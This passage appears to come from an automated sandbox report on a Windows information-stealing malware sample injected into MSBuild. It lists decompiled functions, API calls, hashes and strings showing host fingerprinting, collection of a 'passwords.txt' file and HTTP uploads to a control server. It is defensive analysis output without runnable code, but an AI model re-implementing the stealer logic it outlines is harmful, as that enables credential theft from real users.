                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                                                                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                                                                          • ExitProcess.KERNEL32 ref: 00404CDC
                                                                                          • InternetCloseHandle.WININET(?), ref: 00404CEC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                          • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                                                                          • API String ID: 2658035217-3274521816
                                                                                          • Opcode ID: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                          • Instruction ID: 11be5296a5fba78ccfa74642cc821248e7657d66928f859353594ff17aad1918
                                                                                          • Opcode Fuzzy Hash: 55ed085d277c474f36801abdb5871a2e9711e2d2595ca9f7e5e1cdb52fd56dac
                                                                                          • Instruction Fuzzy Hash: 90624EB190014DEADB11EBE0C956BEEBBB8AF18308F50417EE505735C2DA786B4CCB65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040C280
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C378
                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                          • lstrcat.KERNEL32(00000000,00425B50), ref: 0040C4A7
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                          • lstrcat.KERNEL32(00000000,00425B54), ref: 0040C4C7
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                          • lstrcat.KERNEL32(00000000,00425B58), ref: 0040C4F6
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                          • lstrcat.KERNEL32(00000000,00425B5C), ref: 0040C525
                                                                                          • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                          • lstrcat.KERNEL32(00000000,00425B60), ref: 0040C554
                                                                                          • lstrcat.KERNEL32(00000000,00425B64), ref: 0040C562
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                          • memset.MSVCRT ref: 0040C5E9
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                            • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                            • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                            • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                            • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                          • String ID: passwords.txt
                                                                                          • API String ID: 3298853120-347816968
                                                                                          • Opcode ID: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                          • Instruction ID: 1ecdebe3f11d8fac3e9d0efa643fe933af64b4fe52e77a22e07e9b20bef025ed
                                                                                          • Opcode Fuzzy Hash: 4b1ff610774e8c77471883ccd83e1c17f67f4a4143a384f07f00799f4a19b9b8
                                                                                          • Instruction Fuzzy Hash: 98C16971800159EEDB15EBE4ED1AEEEBB75BF18304F10403AF511721E1DB782A09DB25
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004041B7
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                            • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                            • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00404205
                                                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00404238
                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
                                                                                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00404369
                                                                                          • InternetCloseHandle.WININET(?), ref: 00404372
                                                                                          • InternetCloseHandle.WININET(?), ref: 0040437B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                          • String ID: GET
                                                                                          • API String ID: 1687531150-1805413626
                                                                                          • Opcode ID: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                          • Instruction ID: 7ce3078965428967d931fab95435fba2e2eaf60a30af71eeb75a30b69647e977
                                                                                          • Opcode Fuzzy Hash: 5c17fe2671a6e7da2559d3110b2e5ff5de3778f8e7e7f5b7b1cd9291ace094b3
                                                                                          • Instruction Fuzzy Hash: 07516DB2900219AFDB10EFE0CC85AEEBBB9EB49344F00513AFA01B2190D7785E45CB65
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00410076
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042626F,00000001,00000000), ref: 004100BE
                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                          • wsprintfA.USER32 ref: 00410132
                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                          • lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00426298), ref: 0041020E
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
                                                                                          • String ID: - $%s\%s$?
                                                                                          • API String ID: 404191982-3278919252
                                                                                          • Opcode ID: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                          • Instruction ID: e683f53884952fc8e4340679726e39bda7e6eb295b9d2e7bf921829342b6fcae
                                                                                          • Opcode Fuzzy Hash: 063371d2b875b6717c154b92f163b7baa1dc5683eb4907d65be1d3fe8856eca0
                                                                                          • Instruction Fuzzy Hash: 177113B190021DEEDF11EFE1DD84EEEBBB9BB18304F10417AE905B2151DB785A88CB64
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004104E2
                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 00410505
                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00410537
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 0041057A
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410581
                                                                                          • wsprintfA.USER32 ref: 004105AD
                                                                                          • lstrcat.KERNEL32(00000000,00426248), ref: 004105BC
                                                                                            • Part of subcall function 004104A2: GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004105DB
                                                                                            • Part of subcall function 00411154: malloc.MSVCRT ref: 00411162
                                                                                            • Part of subcall function 00411154: strncpy.MSVCRT ref: 00411172
                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 00410608
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                                                          • String ID: :\$C
                                                                                          • API String ID: 688099012-3309953409
                                                                                          • Opcode ID: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                                          • Instruction ID: 31ba2aefab9431e017bcb41f2bdcd0be11d417c1f72aa959c07d5e8bae5074a4
                                                                                          • Opcode Fuzzy Hash: 1522b66ae9d2de447abac276b6048746d7087383805eda5a4ea2a9c8c75e97bf
                                                                                          • Instruction Fuzzy Hash: 8D418071801158ABCB11EBE5DD89EEFBBBDEF4A304F10006EF505A3141EA385A48CBB5
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0041311D
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                                                            • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                                                            • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                                                            • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                                                            • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                                                            • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                                                            • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                                                            • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                            • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                          • StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                          • API String ID: 3807055897-1526165396
                                                                                          • Opcode ID: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                                          • Instruction ID: 62ef994e2eebf51157d4abcec818fbc8b07954dcba3d20b807130a2a391ecf21
                                                                                          • Opcode Fuzzy Hash: 2c86652b872a1e0dadd1c653e9dcbefc8a1b1809ca84a3556183aa192fa2429b
                                                                                          • Instruction Fuzzy Hash: A341A4B1900258EACB11FFA5D956FDDB7B4AF18708F10017EF90173182DB786B48CA6A
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 0041043B
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                                          • RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                                          • RegCloseKey.ADVAPI32(004264F6,?,?,00000000), ref: 0041047F
                                                                                          • CharToOemA.USER32(?,?), ref: 00410493
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CharCloseOpenQueryValuememset
                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                          • API String ID: 2391366103-1211650757
                                                                                          • Opcode ID: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                          • Instruction ID: 59bbf989d6e17c2dbf70e6b3d9441336261c3d0a51168b80e9bc1bfc74bcefc6
                                                                                          • Opcode Fuzzy Hash: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                                          • Instruction Fuzzy Hash: BA014F7590421DFFEB10EB90DC8AFEABB7CEB14704F1000A5B244E2051EAB45EC88B60
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00416132
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00416188
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004161AE
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004161CE
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004161E2
                                                                                          • lstrcat.KERNEL32(?), ref: 004161F5
                                                                                          • lstrcat.KERNEL32(?,?), ref: 00416209
                                                                                          • lstrcat.KERNEL32(?), ref: 0041621C
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                            • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00415E66: _EH_prolog.MSVCRT ref: 00415E6B
                                                                                            • Part of subcall function 00415E66: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 00415E83
                                                                                            • Part of subcall function 00415E66: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 00415E8A
                                                                                            • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415EA2
                                                                                            • Part of subcall function 00415E66: FindFirstFileA.KERNEL32(?,?), ref: 00415EB9
                                                                                            • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426894), ref: 00415ED6
                                                                                            • Part of subcall function 00415E66: StrCmpCA.SHLWAPI(?,00426898), ref: 00415EF0
                                                                                            • Part of subcall function 00415E66: wsprintfA.USER32 ref: 00415F14
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                          • String ID:
                                                                                          • API String ID: 2058169020-0
                                                                                          • Opcode ID: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                          • Instruction ID: c8bc0cfaec16e0a9c8e3cc6943dd29f550fca9c9c6472c90ce97e84fdf381955
                                                                                          • Opcode Fuzzy Hash: 27df2bee6747110bfdf8ae1cd169a3c4ba849b41f39ec8b444c4dbb6a37d260a
                                                                                          • Instruction Fuzzy Hash: A541FEB2D0022DAACF11EBE0DC49EDE77BCAF1D314F4005AAB505E3051EA78D7888B64
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00406190
                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                                                                          • String ID:
                                                                                          • API String ID: 3869837436-0
                                                                                          • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                          • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                                          • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                                          • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory), ref: 0041065F
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 00410666
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?), ref: 00410694
                                                                                          • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000), ref: 004106B0
                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,00414A17,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?), ref: 004106B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID: Windows 11
                                                                                          • API String ID: 3466090806-2517555085
                                                                                          • Opcode ID: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                          • Instruction ID: 104df8f2525a0fd679668ea989e6de38b513391d3ca0bb797f84468fdfaa6df1
                                                                                          • Opcode Fuzzy Hash: 5f1e27fdb62b933d2b61b99a876454972edf3bd6176160e80f00ebf938befaf3
                                                                                          • Instruction Fuzzy Hash: 19F06279640215FBEB209BD1DD0AFAA7A7EEB49B04F201075FB01E61A0D7B49A509B24
                                                                                          APIs
                                                                                            • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                                            • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                                            • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                                            • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                                            • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                                            • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                                          • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426AC0,?,00000000,0042656F), ref: 004172F1
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                                          • ExitProcess.KERNEL32 ref: 0041731C
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1043047581-0
                                                                                          • Opcode ID: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                          • Instruction ID: 5fe09bd252f0d150a6d3d00478baf6c0c38f56ac8277075a71d8cdb1780555ff
                                                                                          • Opcode Fuzzy Hash: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                                          • Instruction Fuzzy Hash: 45112C71900019BBCB11FBA2DD6ADEEB77DAE55304B50007EB502B24E1DF386A09CA69
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                            • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
